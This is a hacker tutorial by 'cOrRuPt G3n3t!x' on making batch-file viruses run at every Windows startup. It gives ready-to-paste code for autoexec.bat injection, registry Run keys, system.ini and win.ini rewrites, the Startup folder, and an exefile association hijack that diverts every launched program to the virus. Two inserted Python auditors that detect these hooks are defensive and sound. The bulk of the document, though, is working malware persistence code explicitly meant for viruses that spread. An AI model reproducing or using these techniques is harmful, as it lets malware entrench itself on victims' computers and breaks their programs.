TUTORIAL:

+_+_+_+_ Batch Startup Techniques ++_+_+_+_+

by

cOrRuPt G3n3t!x

In this tutorial I will be discussing the different methods you can use to make your batch file execute
on startup. Not every method here works on every version of Windows, though: the registry Run keys, the
Startup folder and the exefile association (methods 2, 5 and 6) work on 2000/XP/Vista, while
autoexec.bat, system.ini and win.ini (methods 1, 3 and 4) are Windows 9x/Me startup mechanisms that the
NT-based versions no longer execute at boot; see the note under each one. It is essential for a proper
virus to start each time the computer is booted so it can carry out its routines on a frequent basis.
This tutorial is not for people trying to learn batch but rather for those trying to advance in batch!!
I would also like to send a big thanks to SAD1c for some of the code I used from his tutorials!!

1)Autoexec.bat Method:
-------------------

There are 2 different methods in autoexec.bat: we can either write the whole virus to autoexec.bat or
we can simply make a hook for autoexec.bat to call our virus. I personally prefer the hooking method, as
an oversized autoexec.bat may raise a few eyebrows; however, I shall illustrate both methods.

Note: C:\autoexec.bat is only run as a startup script by Windows 9x/Me. Windows 2000/XP/Vista do not
run it at boot: at most its SET and PATH lines are picked up into the logon environment, and commands
in it are never executed, so on those systems this method does nothing. The nearest NT-side relative is
%SystemRoot%\system32\autoexec.nt, which the 16-bit subsystem runs each time a DOS program is started,
not at boot.

a)Copying whole virus to autoexec.bat (this should be put in the beginning of your virus):
-----------------------------------------------[Cut Here]---------------------------------------------
attrib -r -h C:\autoexec.bat
rem only append once: skip if our marker line is already in there,
rem otherwise autoexec.bat grows by a full copy of the virus on every run
find "my virus would be here" C:\autoexec.bat >nul
if not errorlevel 1 goto skipauto
echo.@echo off>>C:\autoexec.bat
echo.echo my virus would be here>>C:\autoexec.bat
echo.pause>>C:\autoexec.bat
:skipauto
attrib +r +h C:\autoexec.bat
-----------------------------------------------[Cut Here]---------------------------------------------
All you have to do is replace the 'echo my virus...' and 'pause' lines with your own virus code, one
echo.line>>C:\autoexec.bat per line of code, adding more lines as needed, and keep one fixed line as the
marker that the find checks for; it will then write your virus code to autoexec.bat once and leave it
alone on later runs.

b)Hooking Autoexec.bat Technique (HAT):

This is my preferred method. It copies the current batch file to C:\WinServ.bat and then hooks
C:\WinServ.bat into autoexec.bat for the next startup (should be placed at the beginning of the virus):
-----------------------------------------------[Cut Here]---------------------------------------------
attrib -r -h C:\autoexec.bat
copy %0 C:\WinServ.bat >nul
rem drop any hook line from a previous run, then add a fresh one. This goes via a
rem temp file: redirecting straight back into C:\autoexec.bat would truncate it before
rem type reads it, and find without /v would keep only the hook and throw the rest away
type C:\autoexec.bat | find /v "WinServ.bat" > C:\autoexec.tmp
echo call C:\WinServ.bat>>C:\autoexec.tmp
copy C:\autoexec.tmp C:\autoexec.bat >nul
del C:\autoexec.tmp
attrib +r +h C:\autoexec.bat
-----------------------------------------------[Cut Here]---------------------------------------------
All you need to do is change the batch name from WinServ.bat to your own. What this code does is strip
the old hooking line and write a new one each time it runs, so autoexec.bat never holds more than one
call line and the batch only gets called up once per startup. Keep in mind that %0 is the name the batch
was started with, so the copy only works when the virus was run by its full path (as Explorer does) or
from its own directory.

2)Registry Method:
----------------

This will show the various registry keys you can use to execute your batch file on each boot. The keys
differ in when and for whom they fire, but they will all - in practice - start your virus each time
the computer is booted:

As I said before there are many variants; here are some:

- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices (Windows 9x/Me only)

- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce (Windows 9x/Me only)

- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

The HKLM keys fire for whoever logs on; the HKCU key fires only for the user who wrote it. The catch is
rights: writing under HKLM needs administrator rights (on Vista that means an elevated prompt, otherwise
REG ADD fails with "Access is denied"), while HKCU can be written by any user, so HKCU\...\Run is the
one that always works. "RunOnce" and "RunServicesOnce" delete the value after running the file, but this
isn't a problem, because the batch file will be executed again and re-add the value. RunServices and
RunServicesOnce are read by Windows 9x/Me only; 2000/XP/Vista ignore them, so use Run or RunOnce there.
They all work on the same principle when adding the values, so I shall show you two. The first is
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run; this adds a value in the HKLM startup
key called 'WinBoot' whose data, the path of the virus, is C:\virus.bat:
-----------------------------------------------[Cut Here]---------------------------------------------
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinBoot /t REG_SZ /d C:\virus.bat /f
-----------------------------------------------[Cut Here]---------------------------------------------
The /f is needed: without it, the second time the batch runs REG ADD finds the value already there, asks
whether to overwrite it and sits waiting for an answer that never comes. The name of the value and the
location of the virus can be changed at will; if the path has spaces in it, the data must carry its own
quotes, since Windows hands the string to the program loader as-is.

Next I will show the REG ADD for HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. It
works on the same principle, except because we are dealing with HKEY_CURRENT_USER instead of
HKEY_LOCAL_MACHINE we write 'REG ADD HKCU...'. See below:
-----------------------------------------------[Cut Here]---------------------------------------------
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinBoot /t REG_SZ /d C:\virus.bat /f
-----------------------------------------------[Cut Here]---------------------------------------------

3)System.ini Method:
------------------

This method makes system.ini call your batch file up each startup. We cannot just write to system.ini,
as that would delete whatever else was in there, so instead we filter it through temporary files in the
current directory, write our own [boot] header and shell= line, and then type the rest back in after
them. Pretty simple, I'd say:
----------------------------------------------[Cut Here]---------------------------------------------
copy %0 %windir%\WinDebug.bat
rem strip the [boot] header and the existing shell= line; everything else is kept
find /v /i "[boot]"<%windir%\system.ini>temp1.tmp
find /v /i "shell=explorer.exe"<temp1.tmp>temp2.tmp
rem rebuild: header, our shell line (full path, so it is found whatever the
rem current directory is at boot), then the filtered original lines
echo [boot]>%windir%\system.ini
echo Shell=Explorer.exe %windir%\WinDebug.bat>>%windir%\system.ini
type temp2.tmp>>%windir%\system.ini
del temp?.tmp
-----------------------------------------------[Cut Here]---------------------------------------------
Explorer.exe is handed WinDebug.bat as the thing to open, so the batch runs as soon as the shell comes
up. Because the old shell= line is removed and a new one written on every run, the file does not grow.

Note: this only does something on Windows 9x/Me. On 2000/XP/Vista the [boot] shell= setting lives in
the registry instead (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, value Shell, normally
explorer.exe); the INI file mapping sends API writes there, and Winlogon reads that value, not the file,
so editing system.ini on disk changes nothing at boot.

4)Win.ini Method:
---------------

We shall now do the same for win.ini: filter it through temporaries, then write the [windows] section
back with our load= line in it. See below:
-----------------------------------------------[Cut Here]---------------------------------------------
copy %0 %windir%\TaskLoad.bat
rem strip the [windows] header and the three lines we are about to rewrite
find /v /i "[windows]"<%windir%\win.ini>temp1.tmp
find /v /i "load="<temp1.tmp>temp2.tmp
find /v /i "run="<temp2.tmp>temp1.tmp
find /v /i "NullPort="<temp1.tmp>temp2.tmp
rem rebuild with a full path in load=, then append the filtered original lines
echo [windows]>%windir%\win.ini
echo load=%windir%\TaskLoad.bat>>%windir%\win.ini
echo run=>>%windir%\win.ini
echo NullPort=None>>%windir%\win.ini
type temp2.tmp>>%windir%\win.ini
del temp?.tmp
-----------------------------------------------[Cut Here]---------------------------------------------
load= starts the programs listed (space separated) minimised at logon and run= starts them normally;
either will do, the batch above uses load= and leaves run= empty.

Note: as with system.ini, this is a Windows 9x/Me mechanism. On 2000/XP/Vista the win.ini [windows]
load= and run= settings are mapped to the registry key
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows (values Load and Run), which is what is read
at logon; the file on disk is not consulted.

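The INI edits in methods 3 and 4 are easier to reason about from the reading side. What follows is an added example, not code from this tutorial or from SAD1c: a small Python audit that parses system.ini and win.ini text the way an analyst checking a 9x machine (or a disk image of one) would, and reports every [boot] shell= that is not plain explorer.exe plus every non-empty [windows] load= or run=. The two INI bodies are constructed samples holding the entries the two methods write (the C:\WINDOWS paths in them are assumed, not taken from a real system), the parser keeps duplicate keys and skips comment lines, and the only default it assumes is that a clean shell= reads explorer.exe.

```python
"""Audit the two legacy INI startup hooks (system.ini [boot] shell= and
win.ini [windows] load=/run=).

Added example, not the tutorial's code.  The two INI bodies below are
constructed samples holding the entries methods 3 and 4 write, plus the
ordinary lines that surround them.
"""
import re

# A clean Windows 9x/Me system.ini carries this shell= (assumption: no OEM
# customisation); anything after explorer.exe is something extra being opened.
DEFAULT_BOOT_SHELL = "explorer.exe"

SAMPLE_SYSTEM_INI = """[boot]
shell=Explorer.exe C:\\WINDOWS\\WinDebug.bat
drivers=mmsystem.dll
[386Enh]
device=*vmm32
"""

SAMPLE_WIN_INI = """[windows]
load=C:\\WINDOWS\\TaskLoad.bat
run=
NullPort=None
; a comment line, which the parser must skip
[fonts]
"""

_SECTION = re.compile(r"^\[(.+)\]$")


def parse_ini(text):
    """Return {section: [(key, value), ...]} with section and key names
    lower-cased.  Keeps duplicates and order (configparser would not),
    skips blank and ';' comment lines, and treats a line without '=' as
    a key with an empty value."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = _SECTION.match(line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None:
            continue
        key, _, value = line.partition("=")
        sections[current].append((key.strip().lower(), value.strip()))
    return sections


def startup_hooks(system_ini, win_ini):
    """(file, section, key, value) for every entry that starts something:
    a [boot] shell= that is not plain explorer.exe, and any non-empty
    [windows] load= or run=."""
    findings = []
    for key, value in parse_ini(system_ini).get("boot", []):
        if key == "shell" and value.lower() != DEFAULT_BOOT_SHELL:
            findings.append(("system.ini", "boot", key, value))
    for key, value in parse_ini(win_ini).get("windows", []):
        if key in ("load", "run") and value:
            findings.append(("win.ini", "windows", key, value))
    return findings


def launched_programs(findings):
    """What a hooked boot actually runs: shell= is explorer.exe followed by
    whatever it is told to open, load=/run= are space-separated lists."""
    programs = []
    for _, section, key, value in findings:
        parts = value.split()
        if section == "boot" and key == "shell":
            parts = parts[1:]  # explorer.exe itself runs on every boot anyway
        programs.extend(parts)
    return programs


if __name__ == "__main__":
    hooks = startup_hooks(SAMPLE_SYSTEM_INI, SAMPLE_WIN_INI)
    for finding in hooks:
        print("%s [%s] %s=%s" % finding)
    print("launched at boot:", launched_programs(hooks))
```

Run it as a script to print the findings for the samples; on a real 9x system feed it the contents of %windir%\system.ini and %windir%\win.ini instead. launched_programs() strips the explorer.exe that every shell= line starts with, so what is left is exactly the extra material a hooked boot would run.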
5)Startup Folder Method:
---------------------

We will now look at the simplest and least hidden method, since most computer literate people will look
here first for anything that starts up, but it is still effective. However, I could not get it to write
to the Windows Vista startup folder; I have done it before, but for the life of me I cannot remember the
technique I used, so for now this method will only work on XP:
-----------------------------------------------[Cut Here]---------------------------------------------
copy %0 C:\WinBoot.bat >nul
copy C:\WinBoot.bat "%UserProfile%\Start Menu\Programs\Startup\" >nul
-----------------------------------------------[Cut Here]---------------------------------------------

Note: the per-user Startup folder is "%UserProfile%\Start Menu\Programs\Startup" on XP, but on Vista it
moved to "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup", so the XP path above does not exist
there. The all-users folder ("%AllUsersProfile%\Start Menu\Programs\Startup" on XP,
"%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup" on Vista) starts for everyone who logs on
but needs administrator rights to write to.

6)Shell Spawning:
---------------

Shell spawning was first seen in SAD1c's BOM batch generator. What it does is associate our batch file
with the extension of an .exe (or anything else we give it), so each time an .exe is opened through the
shell it will instead open our batch file and the .exe won't be opened, a very good way to keep our batch
in memory. I tried out SAD1c's shell spawn and it did not gel too well with my Windows Vista, so instead
I made my own; similar but a lot smaller and less complex:
-----------------------------------------------[Cut Here]---------------------------------------------
copy %0 C:\WinBat.bat
rem write the launcher first (> on the first line so it is recreated rather than
rem appended to on every run), so it exists before any .exe gets pointed at it
echo.set shell = createobject("wscript.shell")>C:\CmdLoad.vbs
echo.shell.run "C:\WinBat.bat">>C:\CmdLoad.vbs
rem now repoint the exefile association at the launcher; %%1 %%* come out as %1 %*
rem in the registry value, so the clicked program and its arguments are passed along
echo.on error resume next>temp.vbs
echo set sh=createobject("wscript.shell")>>temp.vbs
echo sh.regwrite "HKCR\exefile\Shell\Open\Command\","wscript.exe C:\CmdLoad.vbs ""%%1 %%*""">>temp.vbs
cscript temp.vbs
del temp.vbs
-----------------------------------------------[Cut Here]---------------------------------------------
It is important to take into account that a lot of .exe's get executed, so your batch will effectively
have residency: every program started through the shell (double-click, Start menu, shortcuts, the Run
box; not programs started straight from a command prompt, which bypass the association) runs it again,
and with the command above the clicked program itself never starts, which the user notices very quickly.
So if your batch is set to send over P2P etc. and it is continuously executed, this could slow systems
down even to a halt!! We should therefore build in conditions, and only when they are met is the batch
routine executed. Two more things to take into account: writing HKCR\exefile lands in
HKLM\SOFTWARE\Classes and needs administrator rights (an elevated prompt on Vista), whereas the same
subkey under HKCU\Software\Classes overrides it for the current user only and needs none; and
CmdLoad.vbs receives the clicked program and its arguments as "%1 %*" but does nothing with them, so
keeping programs working would mean the launcher also runs what it was handed, which the one above does
not attempt.

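Checking the registry methods (2 and 6) from the other side, as an added example that is not part of the tutorial: 'reg export <key> out.reg' on XP and later writes a text dump in the "Windows Registry Editor Version 5.00" format, and the Python below parses that format far enough to list every value under a Run, RunOnce, RunServices or RunServicesOnce key and to compare the exefile open command with the stock one, "%1" %*. Assumptions: the dump has already been read as text (reg export writes UTF-16, so decode it first), only string values matter (dword:/hex: data is kept as raw text), and the sample dump is constructed to hold the entries methods 2 and 6 create plus one ordinary-looking entry ("Updater", pointing at a made-up upd.exe) for contrast.

```python
"""Parse a 'reg export' dump and list the persistence points used above.

Added example, not the tutorial's code.  Input is the .reg text format
(assumption: already decoded to str; reg export writes UTF-16).  The
dump below is constructed: it holds the values methods 2 and 6 write,
plus one ordinary-looking entry so the filters have something to skip.
"""
import re

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinBoot"="C:\\virus.bat"
"Updater"="\"C:\\Program Files\\Example\\upd.exe\" /quiet"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WinBoot"="C:\\virus.bat"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="wscript.exe C:\\CmdLoad.vbs \"%1 %*\""
'''

# A stock exefile association runs the clicked file itself with its arguments.
CLEAN_EXEFILE_COMMAND = '"%1" %*'
# Key names whose values are started at boot/logon (the last two: Windows 9x/Me only).
RUN_KEY_NAMES = ("run", "runonce", "runservices", "runservicesonce")
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs")

# '"name"=data' or '@=data'; the name may contain escaped quotes/backslashes.
_VALUE_LINE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')


def _unescape(s):
    """Undo .reg string escaping: a backslash escapes the character after it."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg(text):
    """Return {key_path: {value_name: data}}.  '@' is the default value.
    Quoted data is unescaped; anything else (dword:, hex:) is kept verbatim."""
    tree = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            tree.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if current is None or not m:
            continue
        name = "@" if m.group(1) == "@" else _unescape(m.group(2))
        data = m.group(3)
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            data = _unescape(data[1:-1])
        tree[current][name] = data
    return tree


def run_entries(tree):
    """(key, value name, command) for every value under a Run-type key, any hive."""
    found = []
    for key, values in tree.items():
        if key.rsplit("\\", 1)[-1].lower() in RUN_KEY_NAMES:
            for name, data in values.items():
                found.append((key, name, data))
    return found


def script_launchers(entries):
    """Run entries whose command names a script: the payloads on this page
    are .bat/.vbs, and a script in a Run key stands out next to the usual .exe."""
    return [e for e in entries
            if any(ext in e[2].lower() for ext in SCRIPT_EXTENSIONS)]


def exefile_hijack(tree):
    """The exefile open command if it differs from the stock one, else None.
    Looks in every hive, because HKCU\\Software\\Classes overrides HKCR for
    that user and is writable without administrator rights."""
    for key, values in tree.items():
        if key.lower().endswith("\\exefile\\shell\\open\\command"):
            command = values.get("@", "")
            if command.lower() != CLEAN_EXEFILE_COMMAND.lower():
                return command
    return None


if __name__ == "__main__":
    tree = parse_reg(SAMPLE_REG)
    for key, name, command in run_entries(tree):
        print("%s  %s = %s" % (key, name, command))
    print("script launchers:", script_launchers(run_entries(tree)))
    print("exefile hijack:", exefile_hijack(tree))
```

On a live XP/Vista box the dumps come from 'reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg' (and the HKCU, RunOnce, HKCR\exefile and HKCU\Software\Classes\exefile keys) decoded from UTF-16; exefile_hijack() returning anything but None means every shell-launched .exe is being routed somewhere else first.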
Thanks a lot for taking your time to read this, I hope it will help you with further ventures into more awesome
batch virii. Please contact me for any queries, problems etc. REMEMBER THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY!!

[?]Contact Me:
-----------

[@]immortalassassin@rocketmail.com